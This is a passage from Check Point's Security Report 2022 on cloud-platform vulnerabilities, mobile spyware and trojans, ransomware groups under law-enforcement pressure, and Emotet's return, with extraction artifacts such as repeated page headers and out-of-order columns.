Supreme Leader’s phone number (the same one
exposed in the train attack). The incident caused
a great deal of disorder with long lines of people
at gas stations fearing shortages and sudden
price increases.
All of the attacks described above had a
substantial impact on a particular target sector
and region. They also gained a lot of media
attention, which naturally plays right into the
hands of cybercriminals in their attempts to
plant fear and gain leverage over their victims.
Unfortunately, as 2021 has demonstrated,
cyberattacks often have a much wider effect on
the general population than the attackers may
have originally intended.
C H A P T E R 3
https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/
21CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 21CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
I TA I G R E E N B E R G VP, Product Management
CLOUD SERVICES UNDER ATTACK In 2020, the global pandemic brought significant changes to the corporate work
environment as well as corporate network architecture. Within those changes, both the
shift to cloud-based architecture – meant to address the need for hybrid, remotely-
managed networks – and the preference for as-a-service providers over traditional
suppliers, have really stood out in terms of the scale of their adoption. Subsequently, in
2021, it became clear that cloud environments were also growing in popularity among
end users. By mid-year, Gartner had released its forecast stating that end-user spending
on public cloud services was estimated to grow by 23% in 2021 to over US$ 332 billion,
compared to US$ 270 billion in 2020 and US$ 242.7 billion in 2019. Enterprises are now
allocating large-scale funds to multi-cloud architectures, with Microsoft Azure and AWS
leading in popularity, and Google Cloud Platform, IBM, VMWare and others dominating a
respectable share of the market.
C H A P T E R 3
It’s understandable that businesses are increasing their dependence on the cloud, particularly as we move into a post-pandemic ‘new normal’ in which hybrid working will play a key part for many sectors. But shifting productivity onto the cloud also means that businesses are relying more and more on vendors to manage their databases, proprietary code and organizational resources, many of them with in-house knowledge gaps that they’re now working hard to fill. Filling those gaps should be a number one objective for businesses in 2022, helping them to leverage their relationship with cloud vendors to their fullest potential in terms of security, compliance and risk.”
https://www.gartner.com/en/newsroom/press-releases/2021-04-21-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-23-percent-in-2021 https://www.zdnet.com/article/the-top-cloud-providers-of-2021-aws-microsoft-azure-google-cloud-hybrid-saas/
22CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 22CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Naturally, organizations are becoming
increasingly dependent on cloud vendors to
securely manage their databases, proprietary
code, and organizational resources. These
organizations are now gradually filling in the
platform and role management knowledge
gaps formed during the rapid shift to cloud-
based environments during 2020, leading
to better security and more comprehensive
administration. IAM (Identity and Access
Management) Role Assumption attacks,
aimed at elevating privileges after obtaining
unauthorized access, however, continue to be a
significant concern.
As usual, threat actors continue to race
against the security research community,
looking for new vulnerabilities and exploits.
Since late 2021, we have witnessed a wave
of attacks leveraging flaws in the services
of industry-leading cloud service providers
to gain control over an organization’s cloud
infrastructure, or, potentially, the organization’s
entire database which stores proprietary,
customer and financial information. The flaws
under discussion are not trust logic flaws –
permission-based flaws that derive from the
organization’s role policy that are used by
threat actors to gradually escalate privileges
within the environment. Instead, we’re dealing
with critical vulnerabilities in the cloud
infrastructure itself, which can allow full takeover
of accounts or arbitrary code execution.
The trend is led by the infamous OMIGOD flaw
attacks. In September, researchers found four
critical vulnerabilities in OMI (Open Management
Infrastructure), one of Microsoft Azure’s
software agents that allows users to manage
configurations across remote and local
environments. OMI is deployed on Azure Linux
VMs embedded into multiple Azure services and
is deployed automatically when some services
are enabled – which makes these flaws highly
likely to be exploited. An estimated 65% of all
Azure customers are vulnerable, which
translates to thousands of organizations and
millions of end-point devices. OMIGOD flaws are
easy to exploit, as only a single request with the
authentication header removed, is needed.
Together, the vulnerabilities could enable actors
to execute remote arbitrary code within a
vulnerable network and escalate to root privileges.
Microsoft already issued a patch to address the
flaws as part of their September 2021 release.
However, some researchers warned that the
company’s automatic fix was ineffective for
several days, until it was repaired. Attacks
leveraging these flaws, in particular the
9.8-rated RCE flaw, assigned CVE-2021-38647,
have already been observed as of the time of
exposure and have increased rapidly ever since.
Servers scanning for vulnerable devices spiked
from around 10 to more than 100 during the
first weekend alone. The notorious Mirai IoT
(Internet-of-Things) botnet was one of the first
C H A P T E R 3
https://blog.checkpoint.com/2021/05/05/check-your-privilege-the-risks-of-privilege-escalation-in-the-cloud/ https://www.praetorian.com/blog/aws-iam-assume-role-vulnerabilities/ https://blog.checkpoint.com/2021/05/05/check-your-privilege-the-risks-of-privilege-escalation-in-the-cloud/ https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 https://www.securityweek.com/attacks-targeting-omigod-vulnerability-ramping https://twitter.com/andrew___morris/status/1438598477718622214
23CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 23CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
other clients’ Kubernetes clusters. Exploitation
of the flaw consists of three stages, beginning
with container escape, which is a privilege
escalation technique for container environments.
Azurescape enables an attacker to gain
administrative privileges over an entire cluster
of containers. Thankfully, a patch was swiftly
released when the flaw was first exposed, but
further action by ACI users is also required. As
of late 2021, no exploits were detected. The flaw,
however, has raised awareness to the dangers
posed by multi-tenant cloud environments,
common large-scale infrastructures that host
multiple organizations on a single platform.
Microsoft Azure is not the only service in
which security flaws were discovered in the
past year. In June, researchers uncovered a
vulnerability in Google’s Compute Engine (GCE),
an infrastructure-as-a-service (IaaS) component
of Google Cloud Platform which is used to create
and launch virtual machines on demand. The
flaw enables an attacker to take over virtual
machines due to a combination of factors,
including the use of weak random numbers by
the ISC DHCP software. Exploitation of the flaw,
achieved by impersonating the Metadata server
from the targeted VM’s point of view, could allow
actors to eventually login as the root user of the
VM. Google issued a patch for the flaw almost a
year after it was first disclosed.
to target vulnerable devices, and the malware
attempted to close port 5896 (the OMI SSL port)
to keep other actors from taking advantage
of the attack. Attacks aiming to deploy crypto
miners onto unpatched Linux devices were also
observed.
Another alarming flaw in Microsoft Azure
was exposed a month earlier, in August. This
time, the vulnerability, dubbed ‘ChaosDB’,
was found in Azure Cosmos DB, a multi-
model NoSQL database used by some of the
top global businesses out there, such as
Coca Cola, Skype, and Symantec, to manage
large-scale databases including financial
transaction information. The flaw enables an
actor to retrieve several internal keys used to
obtain root privileges that eventually enable
it to manage the organization’s databases and
accounts. Simply put, by exploiting this flaw,
attackers can gain complete and unrestricted
control of the entire cloud resources of all
Azure Cosmos DB clients.
Yet another breach in Microsoft Azure was
discovered towards the end of the year. The
flaw, called ‘Azurescape’, affects Azure’s
Container-as-a-Service (CaaS) platform and
relies on a two-year-old vulnerability assigned
CVE-2019-5736 in RunC, a container runtime.
Uniquely, Azurescape is a cross-account
vulnerability: it allows an attacker to break out
of the breached environment and execute code
on environments belonging to other users in the
same public cloud service. This means that a
malicious user of the Azure Container Instances
(ACI) could potentially run arbitrary code on
C H A P T E R 3
https://threatpost.com/azurescape-kubernetes-attack-container-cloud-compromise/169319/ https://thehackernews.com/2021/06/unpatched-virtual-machine-takeover-bug.html https://github.com/irsl/gcp-dhcp-takeover-code-exec https://www.securityweek.com/google-working-patching-gcp-vulnerability-allows-vm-takeover https://twitter.com/GossiTheDog/status/1438832601221976065 https://therecord.media/ddos-botnets-cryptominers-target-azure-systems-after-omigod-exploit-goes-public/ https://www.wiz.io/blog/chaosdb-how-we-hacked-thousands-of-azure-customers-databases https://gotcosmos.com/about/customers https://www.wiz.io/blog/chaosdb-explained-azures-cosmos-db-vulnerability-walkthrough https://unit42.paloaltonetworks.com/azure-container-instances/ https://msrc-blog.microsoft.com/2021/09/08/coordinated-disclosure-of-vulnerability-in-azure-container-instances-service/ https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/ https://www.paloaltonetworks.com/blog/2021/09/azurescape/
24CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 24CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
FPO
Recent research also provides an in-depth
review of a technique called HTTP header
smuggling and its potential use to attack
AWS’s API Gateway and AWS Cognito, an
authentication provider. The research
demonstrates how this technique could be
leveraged to bypass restrictions and achieve
cache poisoning.
Finally, in late 2021 researchers noticed a
peculiar change in AWS permissions that
could allow AWS support services to read
a customer’s S3 bucket data, instead of
just observing its metadata. This potential
privacy flaw was made possible by a change
to the permissions of a mandatory role called
‘AWSServiceRoleForSupport’, created to
allow technical and administrative support.
Eventually, the change was reverted and AWS
stated that they will implement additional
safeguards to prevent such misconfigurations in
the future.
To conclude, in 2021 cloud provider
vulnerabilities became much more alarming
than they were previously. The vulnerabilities
exposed throughout the year have allowed
attackers, for variable length timeframes,
to execute arbitrary code, escalate to root
privileges, access mass amounts of private
content and even cross between different
environments. In short, vulnerabilities in the
cloud infrastructure itself have been exposed,
that even the most vigilant and professional
cloud consumer could not have foreseen or
prevented.
C H A P T E R 3
https://www.intruder.io/research/practical-http-header-smuggling https://twitter.com/QuinnyPig/status/1473705669517791253 https://aws.amazon.com/security/security-bulletins/AWS-2021-007/
25CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 25CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
We must first address the developments
around NSO’s Pegasus, one of the most
notorious mobile malware families. Pegasus
is a mobile spyware capable of infecting both
iOS and Android devices, and was developed
and marketed by the Israel-based NSO Group.
The spyware can gain full control of a mobile
device and harvest a multitude of data types
such as messages, photos, calendars, emails
and more. Additionally, the malware is capable
of activating the camera, collecting images, as
well as recording surrounding conversations.
Pegasus’ infection is based on an elaborated
zero-click exploit. Though the malware was
first discovered in 2016, in 2019 it was revealed
that the spyware leveraged the WhatsApp
service to infect over 1,400 users, the targets of
multiple NSO customers.
In July 2021, a vast collection of news outlets
reported that the tool had been used to gain
access to mobile devices of government
officials, journalists, human rights activists and
MOBILE ARENA DEVELOPMENTS Throughout 2021, threat actors gradually increased their focus on mobile devices, for both
large-scale end user campaigns and targeted enterprise attacks. A survey-based
study revealed that implementation of the ‘BYOD’ (Bring-Your-Own-Device) policy in the
workplace, in which employees replace designated corporate devices with their own
personal devices, caught organizations unprepared, with approximately 49% of
surveyed organizations indicating that they are unable to detect an attack or incident
on employee-owned devices.
business executives worldwide. A list containing
around 50,000 potential Pegasus victims was
leaked and made headlines, possibly shedding
light on NSO’s customers. The media attention
led to extensive research in an effort to uncover
Pegasus’ infection methods and help users
detect Pegasus on their devices. Eventually,
in September, Apple issued patches for two
zero-day vulnerabilities in iMessage leveraged
by Pegasus, assigned CVE-2021-30860 and
CVE-2021-30858. These flaws exploit iPhones
and Macs by allowing malicious documents
to execute commands. In November, Apple
filed a suit against NSO for using their hacking
software on Apple devices and stealing
private data. Naturally, the threat actors
quickly tailored an extortion scam based on
the scandal. A recent campaign leverages the
public fear of Pegasus iOS spyware, seeking to
intimidate potential victims by spreading emails
containing ransom demands and claiming to
have private videos of the victims, allegedly
taken by the Pegasus malware.
C H A P T E R 3
https://www.theguardian.com/news/2021/jul/18/what-is-pegasus-spyware-and-how-does-it-hack-phones https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html https://www.theguardian.com/world/2020/apr/29/whatsapp-israeli-firm-deeply-involved-in-hacking-our-users https://techcrunch.com/2021/07/19/toolkit-nso-pegasus-iphone-android/ https://www.bloomberg.com/press-releases/2021-06-15/bitglass-study-finds-security-gaps-continue-to-be-pervasive-across-bring-your-own-device-byod-initiatives https://forbiddenstories.org/case/the-pegasus-project/ https://www.siliconrepublic.com/enterprise/pegasus-spyware-is-my-phone-infected https://www.helpnetsecurity.com/2021/09/14/cve-2021-30860/ https://www.cnet.com/tech/mobile/apple-sues-pegasus-spyware-developer-what-you-need-to-know/ https://www.bleepingcomputer.com/news/security/pegasus-iphone-hacks-used-as-lure-in-extortion-scheme/
26CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 26CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Pegasus stands out due to its seamless, zero-
click infection process, controversial victim list
and sophisticated data exfiltration features. It is
therefore not surprising that it is no longer the
only one of its kind. Toward the end of the year,
researchers exposed an additional threat actor
in the private sector mobile spyware arena.
Cytrox, a company based in North Macedonia,
markets a spyware called Predator for iPhone
devices, which infects the customer’s targets
via single-click links sent over WhatsApp. As
more and more information about the malware
capabilities is exposed, the greater the chance
that these will be adopted by common threat
actors and groups. In addition, the wide
distribution of mobile spyware and the attention
this field has attracted in 2021 are yet further
indications of the crucial role mobile devices
play in the cyber threat landscape.
Throughout the year, we observed threat actors
investing substantial efforts in hacking top
social media accounts such as Facebook and
Telegram. These efforts included the execution
of large-scale attack campaigns aimed at
obtaining access to mobile devices. In August,
a new Android Trojan called ‘FlyTrap’ was
found to have compromised at least 10,000
Facebook accounts across 144 counties since
March 2021, predominantly through malicious
applications available on the Google Play Store.
The applications were uploaded and quickly
removed from the platform but were later
available on third-party app stores. Attackers
also leveraged WhatsApp to distribute a
modified version of the app for Android
devices that installs the “Triada” Trojan. In
October, researchers found a photo editing
application offered on the Google Play Store
which contained a malicious code that collected
users’ Facebook credentials and used them to
run ad campaigns with the victim’s payment
information. The app was downloaded by
thousands of users. Finally, in November, a new
Android malware called ‘MasterFred’ rose to
prominence due to its use of fake login overlays
to steal credit card information from Netflix,
Instagram and Twitter users.
Another significant attack vector that was
prominent in 2021 relies on SMS messages
for malware distribution. SMiShing, short for
SMS phishing, is a phishing technique that
relies on mobile devices for social engineering
distribution, and uses SMS messages as the
attack vector. The FluBot Android botnet, which
relies on this technique, resumed its activities
in April 2021 despite designated arrests by the
Spanish police. In September, the botnet added
to its arsenal a new method to compromise
Android devices, and began spreading a fake
security update message, warning of a FluBot
infection. The infection is triggered once the
victim clicks on the ‘install security update’
button. FluBot appeared again in November
in a campaign targeting Finnish users. After
the attack vector demonstrated its efficiency
in FluBot’s campaigns, SMiShing has been
gradually adopted by low-skilled actors. For
example, a recent investigation conducted by
Check Point Research indicated that SMiShing
attacks are very effective in Iran, despite the
C H A P T E R 3
https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/ https://securityaffairs.co/wordpress/121434/mobile-2/modified-android-whatsapp-triada-trojan.html https://www.bleepingcomputer.com/news/security/photo-editor-android-app-still-sitting-on-google-play-store-is-malware/ https://www.bleepingcomputer.com/news/security/new-android-malware-targets-netflix-instagram-and-twitter-users/ https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/ https://www.kyberturvallisuuskeskus.fi/en/be-aware-malware-spread-sms https://research.checkpoint.com/2021/smishing-botnets-going-viral-in-iran/
27CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 27CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
general low quality of the actors’ toolsets.
These campaigns utilize SMiShing while also
impersonating key entities such as the Iranian
government, the judiciary system, shopping
portals and more. Many warnings about this
now thriving attack method appeared in news
outlets. The scale of the recent attack wave is
unprecedented, which comes as no surprise if
you inspect the flourishing botnet-as-a-service
market taking place in underground forums and
Telegram channels. Phishing kits are available
for prices ranging from USD$ 50-US$ 100. We
estimate that similar campaigns, also inspired
by FluBot’s successful use of SMiShing, might
soon appear in other countries as well.
Another extensive scam that took place in 2021
revolving around SMS messages is ‘UltimaSMS’,
a massive campaign that utilizes around 150
Android applications. With more than 10 million
downloads from the Google Play Store, its trick
is to lure victims into subscribing to premium
SMS services without their knowledge.
Finally, systematic changes caused by the
global pandemic are also affecting the mobile
banking malware arena. The expanding
digitization of the banking sector in 2021 led to
the surfacing of various applications designed
to limit offline interactions, which in turn
have led to the distribution of new threats. In
September, Check Point Research uncovered a
new attack method against Android users that
abuses the device’s accessibility services. The
attack targeted users of PIX, a year-old, yet
extremely popular, instant payment solution
created and managed by the Brazilian Central
Bank. The campaign featured two variants of
banking malware distributed by two malicious
applications on the Google Play Store. The more
unique one, called PixStealer, abused Android’s
Accessibility Services (AAS) to steal money
from a specific bank through PIX transactions.
This minimalistic yet innovative combination of
functions allows the malware to collect funds
without interacting with a C&C, helping it to
remain undetected. Due to its simplicity and
efficiency, we can expect other threat actors to
follow this lead.
C H A P T E R 3
https://www.iribnews.ir/fa/news/3181066/%DA%A9%D9%84%D8%A7%D9%87%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C-%D8%A7%D8%B2-%D8%B7%D8%B1%DB%8C%D9%82-%D8%A7%D8%B1%D8%B3%D8%A7%D9%84-%D9%BE%DB%8C%D8%A7%D9%85%DA%A9-%D8%AC%D8%B9%D9%84%DB%8C-%D8%A8%D8%A7-%D9%86%D8%A7%D9%85-%D8%B3%D8%A7%D9%85%D8%A7%D9%86%D9%87-%D8%AB%D9%86%D8%A7 https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/
28CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 28CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
This was a turbulent year for several
ransomware groups, not the least because
governments and law enforcement agencies
changed their stance against organized threat
actors. They turned from preemptive and
reactive measures to proactive offensive
operations targeting the ransomware
operators themselves, as well as their funds
and supporting infrastructure. The major
shift happened following the Colonial Pipeline
incident in May, where a DarkSide ransomware
attack resulted in a major fuel shortage
throughout the East Coast in the US, thus
causing the Biden administration to realize they
had to step up efforts to combat the threat.
The ransomware operators are the backbone
of the whole operation, offering not just the
ransomware itself, but also money laundering
services and negotiation specialists. The
different ransomware programs compete for
affiliates, so ransomware groups are constantly
developing more attractive tools and services
for their affiliate programs in order to help
them stand out in a competitive underground
community. Reputation is a key motivating
factor, as that can influence a group’s
chances of earning big returns or even lead to
apprehension by the authorities. It’s therefore
not surprising that cybercriminals mediate their
internal disputes on tribunal forums, where
losing a case can cost a group their reputation
and profits.
CRACKS IN THE RANSOMWARE ECOSYSTEM Gone are the days when ransomware operators negotiated a ransom of US$ 200 for your
family photos. Today’s ransomware economy is a complex operation extorting millions
of dollars per ransom, holding entire organizations captive under the threat of total
system shutdown. The evolution of the ransomware business model is at the core of this
phenomenon. Ransomware-as-a-Service (RaaS) introduces affiliate programs at low
onboarding costs, enabling any attacker to easily join the trend. The attacker selects one of
the leading ransomware “projects” and follows the detailed, easy to follow complimentary
operations manual, which contains complete instructions for every stage of the attack. If the
intrusion was successful, the ransomware operators and affiliates share a percentage of
the victim’s ransom payment. This extremely profitable scheme allows attackers to reach a
wider range of victims and offers higher returns to all involved.
C H A P T E R 3
https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/ https://threatpost.com/scammers-cybercrime-court/176834/ https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/
29CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 29CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
issued its “Ransomware Action Plan”, which
includes the formation of a new special task force
and harsher punishments for ransomware actors.
In November, an international joint operation
led by Interpol named “Operation Cyclone”,
led to infrastructure seizure and arrests of
money laundering affiliates for Cl0p, the group
responsible for the Accellion breach, which
was the source of numerous double and triple
extortions. In addition, the US DOJ and other
federal agencies pursued further actions
against REvil. These actions included members’
arrests, the seizure of US$ 6 million worth of
ransom money, confiscation of devices and a
bounty program worth US$ 10 million.
The reaction to these developments varied
widely within the ransomware ecosystem. Some
groups showed hostility and applied even more
pressure on their victims to keep authorities
away from their business. For example,
Grief Ransomware threatened to completely
delete their victims’ decryption keys should
they hire professional negotiators. Similarly,
RagnarLocker posted online all of the content
stolen from victims that contacted the FBI or
other law enforcement agencies.
Other groups appear to have concentrated on
adapting and rebranding themselves to avoid
being too closely associated with a prominent
attack. Darkside, for example, temporarily
exited the ransomware arena and at least
some of its members rebranded themselves
as BlackMatter in July. They carried out
Later that month, the DarkSide
gang announced they were shutting down
operations after their servers were seized
and their cryptocurrency funds, which were
used to pay affiliates of the Ransomware-
as-a-Service program, were stolen. In
June, the US Department of Justice (DOJ)
upgraded ransomware to a national security
threat, placing it at the same priority level as
terrorism. The next major incident surrounded
the Kaseya MSP platform breach in July,
after which REvil perpetrators mysteriously
disappeared, taking their leaks website “Happy
Blog” offline and apparently shutting down their
customer support. However, this shutdown
was short-lived and the group resurfaced in
September. Then, they disappeared again in
October after a suspected law enforcement
operation successfully hijacked their
infrastructure and “Happy Blog”.
In September, the Biden administration took
their war against ransomware a step further
and announced they would begin sanctioning
crypto exchanges, wallets and traders that
ransomware threat actors use to convert
ransom payments into tangible funds. The
Russian-based SUEX exchange was the first to
be added to the sanctions list for their part in
ransom transactions. The next month, the
European Union and an additional 31 countries
announced they would join the effort to disrupt
additional cryptocurrency channels, in an
attempt to cripple the money laundering
process. In addition, the Australian Government
C H A P T E R 3
https://www.homeaffairs.gov.au/about-us/our-portfolios/cyber-security/strategy/australias-ransomware-action-plan https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/ https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/ https://www.theregister.com/2021/09/15/grief_corp_ransomware_negotiator_rage/ https://www.bleepingcomputer.com/news/security/ransomware-gang-threatens-to-leak-data-if-victim-contacts-fbi-police/ https://www.bankinfosecurity.com/blogs/blackmatter-ransomware-appears-to-be-spawn-darkside-p-3075 https://www.hackread.com/darkside-ransomware-quits-bitcoin-servers-seize/ https://www.reuters.com/technology/exclusive-us-give-ransomware-hacks-similar-priority-terrorism-official-says-2021-06-03/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://heimdalsecurity.com/blog/revil-ransomwares-servers-have-resurfaced-after-being-down-for-two-months/ https://techcrunch.com/2021/10/18/revil-ransomware-group-goes-dark-after-its-tor-sites-were-hijacked/ https://gizmodo.com/biden-administration-reportedly-plans-sanctions-to-co-1847697017 https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210921 https://www.wsj.com/articles/white-house-ransomware-summit-eyes-tighter-global-scrutiny-for-crypto-11634227377
30CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 30CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Finally, this past year, we also saw signs of
the ransomware community cracking under
pressure or even closing shop altogether,
with some operators completely abandoning
their businesses. For instance, the Avaddon
cybercrime gang first appeared in June
2020, but only a year later was compelled
to shut down and release decryption keys,
undoubtedly due to the increased scrutiny by
law enforcement. In another instance, Conti
ransomware targeted British Graff Jewelry,
but later issued an apology after realizing
that some of the stolen data belonged to the
Saudi, UAE & Qatar Royal Families. Fearing
retaliation, they promised to delete the data
without review. Major cybercrime forums
banned any ransomware advertising from their
platform to avoid drawing attention. This made
it more difficult for operators to effectively
communicate with affiliates, adding to the risk
of being caught.
Proactive measures and offensive operations
by governments worldwide have managed
to put a noticeable dent in the ransomware
ecosystem, disrupting ransomware operations
and causing havoc in the underground scene.
Despite this, millions of dollars in potential
revenue mean that we will likely see more
ransomware “projects” coming up in 2022,
with successful ones serving as a model for
upcoming and improved attacks. One takeaway
the ransomware operators may have from
the events of 2021 is that the type of targets
ransomware operators choose might be the
difference between a long term operation or a
very short one.
attacks against the marketing service provider
Marketron, the Japanese tech company
Olympus, and critical infrastructure such as
the New Cooperative farmers organization in
Iowa. However this rebranded operation was
short lived, when in November, BlackMatter
announced they were shutting down due to
pressure from the authorities. They even said
that their team members were “no longer
available after the latest news”, yet experts
believe that this exit was a result of trust issues
with their affiliates due to flawed encryption,
allowing a security company to decrypt victims’
files. In a final testament to underground
cooperation, BlackMatter has partnered with
LockBit ransomware and transferred their
victims to the LockBit platform to facilitate a
seamless extortion, just before vanishing.
Unfortunately, not all ransomware groups
exhibited this harmonious cooperation. The
fear of being apprehended by the authorities
was compounded by marked distrust promoted
by constant competition. For example, REvil
operators were caught cheating their affiliates
by hijacking the ransom negotiation process,
using double chats and backdoors to cut them
out of their shares. The Conti group experienced
an internal crisis after one disgruntled affiliate
leaked Conti’s playbook, complaining of low
compensations.
C H A P T E R 3
https://blog.malwarebytes.com/ransomware/2021/06/another-one-bites-the-dust-avaddon-ransomware-group-shuts-down-operation/ https://www.dailymail.co.uk/news/article-10172879/Russian-cyber-hackers-carried-virtual-heist-jewellers-Graff-make-grovelling-apology.html https://latesthackingnews.com/2021/05/17/cybercrime-forums-xss-exploit-raidforums-ban-ransomware-ads https://www.bankinfosecurity.com/blackmatter-knocks-marketron-off-air-a-17588 https://threatpost.com/blackmatter-ransomware-olympus/169423/ https://www.zdnet.com/article/iowa-farm-services-provider-hit-with-blackmatter-ransomware-and-5-9-million-ransom/ https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/ https://therecord.media/free-decrypter-announced-for-past-blackmatter-ransomware-victims/ https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ https://threatpost.com/revil-affiliates-leadership-cheated-ransom-payments/174972/ https://www.bankinfosecurity.com/conti-ransomware-threat-rising-as-group-gains-affiliates-a-17448
31CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
C H A P T E R 4
MALWARE SPOTLIGHT: EMOTET’S RETURN
04
EMOTET, ONE OF THE MOST DANGEROUS AND INFAMOUS BOTNETS IN HISTORY, IS BACK, DESPITE THE LONG AND SYNCHRONIZED EFFORTS OF THE INTERNATIONAL COMMUNITY AND LAW ENFORCEMENT AGENCIES WORLDWIDE THAT RESULTED IN ITS TAKE DOWN IN JANUARY 2021.
32CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 32CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Emotet, one of the most dangerous and infamous botnets in history, is back, despite the
long and synchronized efforts of the international community and law enforcement agencies
worldwide that resulted in its take down in January 2021. Emotet, the banking Trojan turned
modular botnet, is known for its massive reach of over 1.5 million infected computers
worldwide, across thousands of compromised corporate networks. Emotet was used as a
distribution platform to deliver other notorious malware families such as TrickBot, Qbot
and Dridex, often resulting in network-wide ransomware attacks that crippled entire
organizations. Inflicted damages were estimated at around US$ 2.5 billion, before it was
forcibly shut down.
A L E X A N D R A G O F M A N Team Leader,
Check Point Research
C H A P T E R 4
Towards the end of the year the world came to the realization that even an international task force, could only slow Emotet down, and not eradicate it altogether.
At least some of its group members were able to elude justice and have taken their time to reorganize, regroup, and to use their old underground connections to launch a new and improved global malspam campaign.
Trickbot and Emotet are old partners in crime, so in many ways it was unsurprising that Emotet would leverage TrickBot’s service as a dropper for its own revival."
https://www.europol.europa.eu/media-press/newsroom/news/world%e2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action https://securelist.com/the-chronicles-of-emotet/99660/ https://www.wired.com/story/emotet-botnet-takedown/
33CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 33CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
On November 14th, Emotet officially rose from the dead, as live samples were observed
for the first time since its takedown. Emotet’s resurrection came from a surprising
source: TrickBot’s botnet was used to drop Emotet’s samples on machines infected with
the TrickBot malware. The very next day, Emotet returned to its signature method of
distribution, with massive spam campaigns delivering the Trojan via malicious document
attachments. To rebuild their network, Emotet operators chose to drop their spam bot on
successfully infected machines, a method that enabled them to distribute the malware to
even more potential targets.
TrickBot’s service as a dropper was a natural choice for Emotet’s revival, thanks to their
rich history of collaboration. In fact, this might suggest that at least some of its old
malware partners are also involved in its resurrection. TrickBot itself was briefly taken
down in 2020, and yet it persisted and was featured in the Top Malware families rankings
of May, June and September 2021. During the last year, Check Point Research spotted
over 140,000 TrickBot victims worldwide, involving over 200 campaigns and thousands of
compromised networks. This huge installation base makes TrickBot the perfect platform to
re-launch Emotet’s new botnet.
Emotet itself came back even stronger with some new additions to its toolbox. The
upgraded variant uses Elliptic curve cryptography as opposed to RSA cryptography,
improved its control-flow flattening techniques, and added to its initial delivery methods
the use of malicious Windows App installer packages that impersonate legitimate software.
In addition, researchers found that Emotet is now dropping Cobalt Strike beacons directly
for the first time, instead of intermediate malware families which in turn would drop
Cobalt Strike beacons after some time. Cobalt Strike has been the cornerstone of targeted
ransomware attacks in previous years, and this unfortunate development means that the
duration from initial Emotet infection to a full blown ransomware attack just got even
shorter, leaving the defenders with far less time to respond to an ongoing attack.
Since its return, Check Point Research observed that the volume of Emotet’s activity was at
least 50% of the level we saw in January 2021, right before the takedown. This rising trend
continued throughout December with several end-of-the-year campaigns, and is expected
to continue well into 2022, at least until the next takedown attempt.
C H A P T E R 4
https://cyber.wtf/2021/11/15/guess-whos-back/ https://isc.sans.edu/diary/28044 https://intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts https://intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts https://blog.checkpoint.com/2021/06/10/check-point-softwares-may-2021-most-wanted-malware-dridex-drops-from-list-while-trickbot-rises-to-top/ https://blog.checkpoint.com/2021/07/13/june-2021s-most-wanted-malware-trickbot-remains-on-top/ https://blog.checkpoint.com/2021/10/08/september-2021s-most-wanted-malware-trickbot-once-again-tops-the-list/ https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/ https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
34CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
C H A P T E R 5
GLOBAL STATISTICS 05
IN 2021, THERE WAS A 50% INCREASE IN OVERALL ATTACKS PER WEEK ON CORPORATE NETWORKS COMPARED TO 2020.
35CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 35CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
GLOBAL
AMERICAS
